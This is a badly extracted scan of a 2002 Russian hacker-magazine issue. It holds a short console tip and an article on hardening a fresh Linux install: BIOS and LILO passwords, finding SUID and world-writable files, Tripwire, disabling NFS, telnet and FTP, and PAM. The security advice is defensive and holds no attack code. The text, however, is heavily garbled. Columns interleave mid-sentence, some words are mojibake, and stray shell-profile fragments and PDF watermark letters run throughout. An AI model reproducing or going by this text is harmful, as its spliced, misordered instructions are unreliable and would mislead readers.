in:/usortal/bin:/usr/X11R6/binHOMEexpoPATHrtX11R6HOMEНа самомbinделе, кое-какие работы по русификации ты #размонтирование маздайных дисков

 

 

 

 

 

Готово. Набираем mp3blaster и наслаждаемся.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

tE

 

 

 

 

 

 

 

 

 

 

 

уже проделал при установке (я надеюсь). Теперь, пе-

umount /mnt/diskC

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PATH

 

 

 

 

 

 

 

реключая раскладку посредством Left Ctrl + Left Shift

umount /mnt/diskD

 

 

 

 

 

 

 

 

Продолжение следует...

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ort

 

PATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ME=/root

 

 

 

 

и удерживая Left Alt, ты можешь писать в консоли

umount /mnt/diskE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-cons25}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ERM:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t HOME

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Взлом >20/04\02

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

port HOME-cons25}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

=${TERM:

 

 

 

 

 

 

 

 

 

 

 

6 Hack-Faq

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

re

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

7 JoyStick

8 Юниты

 

 

9 Quit>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t TERM

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

59

 

 

 

 

 

5

 

Кодинг

 

 

 

 

 

 

 

 

 

 

 

 

 

 

GER

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

R=more

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t PAGER

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

 

D

 

 

<Page 060>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

w Click

to

BUY

 

 

Взлом

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

X

 

 

 

 

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

t

 

ХАКЕР\¹40\Апрель\2002P

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

r

 

 

 

 

 

NOW!

o

 

 

 

 

BUY

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

.

 

 

 

 

 

.c

 

 

p

 

 

 

 

g

 

 

 

 

df

 

 

n

e

 

 

 

 

-x cha

 

 

 

 

БЕЗОПАСНОСТЬ В ЛИНУКСЕ С НУЛЯ СУПЕРСЕКЬЮРНАЯ ОСЬ - НЕ ПРОБЛЕМА!

Нагорский Артем aka Cordex

 

 

 

 

 

(cordex@real.xakep.ru)

БЕЗОПАСНОСТЬ

 

 

 ËÈ

ÍÓÊÑ

Å

Ñ

ÍÓËß

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Ñóï

 

 

 

 

 

 

 

ерсекьюрная

Îñü

 

 

 

 

 

 

 

—íå

пробл

åìà!

 

 

 

 

 

 

 

 

 

 

Жизнь всякого про-

 

 

двинутого

 

ãèêà è

 

 

хацкера

â

 

Инете...

 

 

Несомненно,

îíà

 

 

связана со многими

 

 

опасностями. И од-

 

 

на из таких опасно-

 

 

стей, о которой час-

 

 

то забывают: плохо

 

 

настроенная в

ïëà-

 

 

íå

безопасности

 

 

*nix-анутая

 

Îñü.

 

 

Многие

ошибочно

 

 

полагают,

 

÷òî Ëè-

 

 

íóêñ

отлично

ñåêü-

 

 

þðåí

ïî

 

дефолту,

 

 

íî ýòî íå òàê. Î

 

 

òîì,

êàê

 

избежать

 

 

этой ошибки и мак-

 

 

симально настроить

 

 

безопасность

òâîå-

 

 

го любимого Линук-

 

 

са, не прикладывая

 

 

особых усилий, мы и

 

 

поговорим.

 

 

 

< Folder1 >

 

 

 

 

 

НУЖНА ЛИ СЕКЬЮРНОСТЬ ТЕБЕ?

Начну с того, что свежеустановленный Линукс не безопасен сам по себе, он секьюрен только тогда, когда его безопасность в должной мере настроена. По меньшей мере наивно полагать, что безопасность требуется компам банков, всяких правительственных организаций и т.д. Так полагают только

ламаки. В наше время никто не застрахован от опасности, АБСОЛЮТНО никто. Она может исходить отовсюду, как от локальных юзеров, так и от твоего соединения с Интернетом. На свете много людей, жаждущих поиметь чужие компы. Вот поче- му так важно правильно настроить свою Ось, больше не парясь о своей безопасности.

< Взлом >20/04\02

60 Ньюсы 1 Феррум 2 PC_Zone 3 X-Стиль 4 Взлом

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Folder2>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

СОСТАВЛЯЮЩИЕ БЕЗОПАСНОСТИ

ний". Для этого используй файл

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

etc/pam.d/limits.conf, где пошамань немного и по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Прежде чем непосредственно перейдем к делу,

ставь, опять-таки по минимуму, право юзерам на

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

позволь мне рассказать тебе о том, что, по моему

процессы. Следующими в списке идут файлы

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мнению, и составляет секьюрность. Во-первых, это

/var/log/wtmp и /var/run/utmp, которые содержат

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

безопасность ВНУТРИ системы, то есть локальная

всю необходимую инфу по залогиниваниям пользо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

безопасность. Во-вторых, это сетевая безопас-

вателей в твоей системе. Поэтому береги их и ни в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ность. В-третьих, это безопасность всех твоих важ-

коем случае не удаляй, ведь часто бывает так, что

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ных файлов. И, наконец, в-четвертых, общая безо-

только по ним можно определить несанкциониро-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пасность, куда отнесем все то, что является наибо-

ванный вход в систему. Одна из самых важных за-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лее общим при настройке секьюрности и без чего

дач - уделить должное внимание всем SUID (set-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тоже никак не обойтись :).

 

user-id permissions) /SGID (set-group-id permissions)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

файлам. Например, иногда прокатывает такая

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ЛОКАЛЬНАЯ БЕЗОПАСНОСТЬ

фишка, что хацкер использует "рутовскую" SUID

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

программу, оставляя SGID в качестве бекдора, что-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Начал я с этого не случайно. Часто бывает, что удар

бы с их помощью получить всю необходимую инфу.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

приходит с той стороны, откуда его никто не ожи-

Для начала нужно найти SUID/SGID файлы. Заюзай

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дал: в данном случае все локальные пользователи

следующую команду:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

на твоей тачке могут нанести непоправимый вред

root# find / -type f \( -perm -04000 -o -perm -02000 \)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

системе. Еще одной причиной является то, что лю-

затем ты можешь изменить права доступа к ним

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бой злобный хацкер пытается вначале зайти в сис-

либо просто-напросто удалить их, так как они со-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тему под обычным юзверем, чтобы заполучить в

держат специальные преимущества при своем ис-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дальнейшем пароль рута в свои подленькие ручки,

пользовании. Файлы, которые содержат в себе

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

используя баги в локальной защите. Дабы этого из-

слова, код и т.д., которые могу быть переписаны,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бежать, займемся тем, что максимально наладим

тоже несут в себе определенную опасность. Обыч-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

локальную секьюрность. Первым делом я предла-

но это системные файлы. Чтобы обнаружить фай-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

гаю поставить тебе пароль на Bios. Зачем? Просто,

лы, используй команду:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

если у тебя нет пароля на Биос, то нехороший че-

root# find / -perm -2 -print

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ловек может выставить в нем загрузку с CD, затем

Так же - по аналогии - поступим с неизвестными

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

выбрать апгрейд системы и, ничего не апгрейдя,

файлами, которые умные люди могут использо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

поменять пароль и войти в систему под новым пас-

вать :). Команда:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сом. Отсюда вытекает правило: ставь загрузку Ли-

root# find / -nouser -o -nogroup -print

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нукса ВСЕГДА с жесткого диска. Если ты такой же

сделает так, что у этих файлов не будет владельца.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

параноик, как и я, то можешь поставить пароль и на

Я уже неоднократно замечал про важность .rhost

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

LILO, конфиг которого валяется в etc/lilo.conf. По-

файлов, замечу и сейчас, что стоит по наплеватель-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сле всего этого удостоверься в том, что для каждо-

ски к ним отнестись, и можно нарваться на боль-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

го из прописанных юзеров у тебя на тачке есть ми-

шие неприятности. Найди их командой:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нимально необходимые для них привилегии, вооб-

root# find /home -name .rhosts -print

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ще - всегда старайся кому бы то ни было ставить

Могу еще порекомендовать программу LSOF

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

привилегии по минимуму. Как говорится, будь па-

(ftp://vic.cc.purdue.edu.pub/tools/unix/lsof),

которая

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

раноиком, и все будет ОК :). Отсюда вытекает еще

отслеживает, какие файлы и сетевые сокеты откры-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

одно правило: как только видишь, что юзверь не

ты. Можно задать тебе небольшой вопросец? Какие

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пользуется отведенным под него аккаунтом, удаляй

из файлов у нас наиболее важные? Правильно, си-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

его сразу. Думаю, с этим ясно, и объяснять не нуж-

стемные. Поэтому очень важно сделать их такими,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

но. Дальше в нашем списке идет Бог системы - рут.

чтобы никакой пользователь не мог их исправить,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Во-первых, входи в его статусе только тогда, когда

кроме, разумеется, рута. Как ты знаешь, Линукс

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тебе действительно нужно что-то подправить в сво-

разделяет контроль доступа к файлам и директори-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ей машине и настроить. Для прочих целей юзай со-

ям по 3 категориям: владелец, группа и другие. По-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

зданный для себя user-аккаунт. Также никогда не

этому правильно выстави значения доступа READ,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

создавай .rhost файлы для рута. Это очень опасно,

WRITE and EXECUTE для конкретных пользователей.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

например, при проведении ип-спуффинга на твой

И, заканчивая разговор о локальной безопасности,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

комп. Далее, что хотелось бы отметить, так это

я бы хотел отметить такую программу, как Tripwire.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

файл /etc/securetty file, который содержит все тер-

Это тулза проверяет наиболее важные твои файлы

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

миналы, куда может залогиниться рут. По дефолту

и конфиги. Она сравнивает предыдущие их состоя-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

там прописаны только виртуальные консоли, поэто-

ния и конечные и, если найдет какие-либо измене-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

му ничего туда не добавляй больше. Ну и, конечно,

ния, немедленно об этом сообщает. Дам тебе не-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

когда ты рут, то сначала думай, а потом делай, что-

сколько советов по ее использованию. Во-первых,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бы потом не плакать :).

 

установи ее не на комп, а на флоппи, который к то-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

му же сделай незаписываемым. Все это делается

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

БЕЗОПАСНОСТЬ ФАЙЛОВ

только для того, чтобы никто не смог подправить

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

базы отчета этой проги. И каждый раз при

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Сначала поставь ограничения на лимит запускае-

выполнении своих ежедневных хацкорских

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мых файлов вместо стандартного "без ограниче-

делишек сделай своей привычкой запус-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Взлом >20/04\02

 

 

 

 

 

 

 

 

 

 

 

 

 

5 Кодинг

6 Hack-Faq

7 JoyStick

8

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

D

 

 

<Page 062>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Взлом

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

БЕЗОПАСНОСТЬ В ЛИНУКСЕ С НУЛЯ СУПЕРСЕКЬЮРНАЯ ОСЬ - НЕ ПРОБЛЕМА!

Нагорский Артем aka Cordex (cordex@real.xakep.ru)

кать Tripwire для того, чтобы удостовериться, что ни-

 

 

 

 

 

 

 

 

 

 

 

 

и получишь инфу по данному сервису. Тебе выдадут

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Короче, советую обратить внимание на сайт

 

 

 

 

чего не было изменено, пока ты с радостным видом

 

 

http://www.openssh.com, но это потом, а пока

 

что-то типа этого:

скачивал порнуху :). И поговорим немного о лошадях

 

 

перейдем к следующему пункту.

 

 

 

 

/usr/sbin/tcpd /usr/sbin/in.fingerd

ака троянах. Говорить очевидные вещи, что каждый

 

 

 

 

 

 

 

 

 

 

 

 

Осталось только в мане посмотреть про in.fingerd,

файл, особенно скачанный с Инета, нужно прове-

 

 

СЕТЕВАЯ БЕЗОПАСНОСТЬ

 

 

 

 

 

чтобы понять, нужен ли тебе данный сервис в этот

рять, я не буду. Если у тебя уставлена Красная Ша-

 

 

 

 

 

 

 

 

 

 

 

 

момент. Хотя ты, как читатель Х, их предназначение

почка, то тут даже все проще: у нее есть MD5, PGP

 

 

Наиболее важная часть моего труда - обеспечить те-

 

должен знать наизусть :).

проверки на подлинность файла. Скажу лишь о том,

 

 

бя должной инфой о твоей сетевой секьюрности,

 

Все те, которые ТЕБЕ не нужны, вырубай, больше не

что НИКОГДА не запускай какие-либо вызывающие

 

 

ведь не секрет, что ты большую часть своего време-

 

парясь о том, что тебя поимеют через не отключен-

подозрения проги в статусе рута. Думаю, зачем, объ-

 

 

ни проводишь в Инете. Поэтому поговорим об этом

 

ные тобой эти сервисы. Есть несколько способов от-

яснять не нужно...

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рубить ненужные тебе сервисы. Один из них -

 

 

 

 

 

 

 

 

Общие советы

 

 

 

 

это использование файла /etc/inetd.conf.

 

 

 

 

 

 

 

 

 

 

 

 

ложены. Что не нужно, просто отключи, при-

ШИФРОВАНИЕ ПАРОЛЕЙ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Просто посмотри, какие сервисы там пред-

Если ты думаешь, что, придумав пароль типа

 

 

Первым делом, когда установил Ли-

 

 

бавив # в начале строки. Другим способом

 

 

нукс, сразу сходи на официальный

 

 

этого: kIwG49znrQ, ты обезопасил твои пароли

 

 

 

 

является отключка сервисов в файле

 

 

сайт за апдейтами и патчами к твоей

 

 

от рук злобных хацкоров, то ты очень ошиба-

 

 

 

 

/etc/services. Но этот способ неудобен тем,

 

 

конкретной версии Линукса. Для ша-

 

 

ешься. Нет, я не спорю, что этот пароль не

 

 

 

 

что и локальные юзеры не смогут найти от-

 

 

почки http://update.redhat.com

Íå ïî-

 

 

слаб, но необходимо также и хорошо зашиф-

 

 

 

 

ключенные сервисы и, соответственно, ис-

 

 

ленись.

 

 

 

 

 

 

 

 

 

ровать его. Линукс по дефолту использует од-

 

 

 

 

 

 

 

 

 

 

 

пользовать их. Кроме того, необходимо

 

 

Регулярно создавай backup-файлы важ-

 

 

ностороннее

шифрование

DES

(Data

 

 

 

 

проверить /etc/rc.d/rcX.d, где X - системный

 

 

ных системных, config и log-файлов.

 

 

Encryption Standard), все зашифрованные па-

 

 

 

 

уровень; проверь там на наличие ненужных

 

 

Каждую неделю делай полный backup.

 

 

роли хранятся, как известно,

â

/etc/passwd

 

 

 

 

сервисов. Но файлы в этой директории ве-

 

 

Не забывай также о постоянном мони-

 

 

или, в меньшинстве случаев,

â

/etc/shadow.

 

 

 

 

дут на /etc/rc.d/init.d, поэтому, изменив

 

 

торинге сетевой активности, просмат-

 

 

Но я бы тебе посоветовал использовать PGP

 

 

 

 

init.d, ты изменишь и rcX.d. «А какие серви-

 

 

ривай, что творят твои пользователи.

 

 

шифрование. Линукс очень хорошо поддержи-

 

 

 

 

сы оставлять?» - спросишь ты. Вот список

 

 

Но, если тебе в лом это, как иногда и

 

 

вает его, и если ты мало знаком с PGP-шиф-

 

 

 

 

тех, которые я бы УБРАЛ:

 

 

мне :), то лучше заюзай поставляемую

 

 

рованием, то тебе, несомненно, стоит взгля-

 

 

 

 

1. NFS (Network File System) и соответ-

 

 

â

большинстве

дистрибутивов

Linux

 

 

íóòü íà http:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тулзу ttysnoop. Кроме того, не забы-

 

 

ствующие сервисы, такие как fsd,

//www.pgp.com/service/export/faq/55faq.cgi,

 

 

 

 

 

 

вай юзать

различные

сканнеры и

 

 

lockd, mountd, statd, ortmapper è òàê

там ты найдешь все необходимое. Если тебя

 

 

 

 

 

 

снифферы,

 

 

чтобы быть

â

курсе всех

 

 

далее. Если ты в танке, то знай, что

и это не устраивает и ты хочешь РЕАЛЬНО

 

 

 

 

 

 

 

 

дел. Не стоит пренебрегать и системны-

 

 

NFS - это стандартный Юникс сервис

обезопасить себя от расшифровки твоих па-

 

 

 

 

 

 

ми логами. Они могут тебе дать крайне

 

 

для расшаренного пользования фай-

ролей, наряду с перечисленным выше весьма

 

 

 

 

 

 

полезную инфу по некоторым вопро-

 

 

лами и папками при соединении.

рекомендую

использовать

PAM (Pluggable

 

 

 

 

 

 

сам :). Для начала ограничь доступ к

 

 

2. rpc.* сервисы, Remote Procedure

Authentication Modules). Говоря простым язы-

 

 

 

 

 

 

/var/log и регулярно их просматривай.

 

 

Call.*, они обычно идут от NFS.

ком - это механизмы для

аутентификации

 

 

 

 

 

 

Посоветую тебе воспользоваться ко-

 

 

3. Printer сервисы тоже.

пользователя. О том, как его настраивать, я

 

 

 

 

 

 

мандой

 

 

 

 

 

 

 

 

 

 

 

4. Протокол Rlogin. Это серверный

говорить не буду: статья не об этом, но ссы-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

chattr +i filename,

 

 

 

 

 

 

 

протокол, и о нем я писал в одном из

лочку, где ты можешь почитать про это,

 

 

 

 

 

 

 

 

 

 

 

 

 

чтобы никакая мразь, кроме рута :), не

 

 

предыдущих номеров Х.

äàì: http:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

могла изменить filename.

 

 

 

 

 

 

 

5. Telnet. Когда нет особой необходи-

//www.kernel.org/pub/linux/libs/pam/index.html.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мости в нем, отруби и его. Ведь его

Вот преимущества при его использовании:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

можно заменить ssh.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1. Использует НЕ DES'овую систему ши-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

6. FTP. Как и телнет, его можно заме-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

фровки паролей, что затрудняет задачу при

 

 

подробно. Существует очень много

тулзенок

äëÿ

 

нить на scp, входящий в ssh.

подборе пароля.

 

 

 

 

 

 

 

 

 

Вот и все. Не забудь после всех манипуляций

 

 

 

 

 

 

 

 

обеспечения

такой

безопасности,

большинство

 

2. Позволяет отдельным юзверям залогини-

 

 

 

с отключкой сервисов проверить, какие оста-

 

 

из которых по дефолту входят во многие дистрибути-

 

ваться в указанные времена и места.

 

 

 

лись. Формат соответствующей команды ты

 

 

вы Linux. Первым делом, выходя в сеть, посмотри,

 

3. Распределяет так системные ресурсы, что

 

 

 

знаешь.

 

 

какие доступные сервисы ты предлагаешь. Главное

 

юзвери не смогут провести DoS-атаки. И по-

 

 

 

 

 

 

 

правило: НЕТ ВКЛЮЧЕННЫХ СЕРВИСОВ - НЕТ ОТ-

 

 

 

 

 

следняя его фишка - это создание теневых

 

 

 

ПОЧТОВЫЕ СЕРВИСЫ

 

 

КРЫТЫХ ПОРТОВ - НЕТ ДОСТУПА. Для просмотра

 

паролей в

/etc/shadow,

который

прочитать

 

 

 

 

 

 

 

 

всех запущенных сервисов переключись на рута и на-

 

 

 

 

может ТОЛЬКО рут.

 

 

 

 

 

 

 

 

 

Включают в себя Sendmail, qmail and MTA's. Несмот-

 

 

 

 

 

 

 

 

бей следующую команду:

 

 

 

 

 

